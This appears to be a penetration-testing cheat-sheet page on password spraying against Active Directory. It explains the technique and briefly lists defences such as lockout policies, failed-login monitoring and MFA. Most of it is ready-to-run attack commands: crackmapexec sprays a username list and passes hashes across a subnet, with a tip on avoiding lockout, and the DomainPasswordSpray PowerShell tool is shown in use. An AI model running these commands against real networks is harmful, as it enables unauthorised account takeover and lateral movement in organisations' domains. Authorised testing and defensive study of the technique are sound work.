Skip to main content

Password Spraying

Password spraying is an attack where an adversary attempts to authenticate against multiple AD user accounts by cycling through a small set of commonly used passwords (e.g., "Spring2024!").

Unlike brute-force attacks that repeatedly target a single account, password spraying spreads attempts across many accounts to evade account lockout policies. Attackers often use tools like Rubeus, CrackMapExec, or Kerbrute to automate authentication attempts against AD services such as Kerberos (TGT requests), NTLM, LDAP, and Web-based portals. If successful, an attacker can gain initial access, move laterally, or escalate privileges within the domain.

Defenses include enforcing strong password policies, enabling smart lockout policies, monitoring failed logins via Event ID 4625, implementing Azure AD Identity Protection, and enforcing multi-factor authentication (MFA) for all external-facing services.

Password Policy

Since password spraying to find a valid domain may cause active accounts in the environment to be locked out, we need to be precise when selecting a password for spraying. To achieve this, we can enumerate the password policy for the environment. The following page explains how to do so:

Linux

# Domain Joined
sudo crackmapexec smb 10.10.10.10 -u usernamelist.txt -p Password123@

# We can grep for '+' to find valid ones.

# Local Account
sudo crackmapexec smb --local-auth 192.168.5.0/24 -u administrator -H <HASH>

# NOTE: --local-auth will prevent account lockout, so always use it when
# playing with admin accounts.

Windows

# https://github.com/dafthack/DomainPasswordSpray

# Import
. .\DomainPasswordSpray.ps1 # OR BELOW
Import-Module ./DomainPasswordSpray.ps1

# Execute
Invoke-DomainPasswordSpray -Password Password123 -OutFile success -ErrorAction SilentlyContinue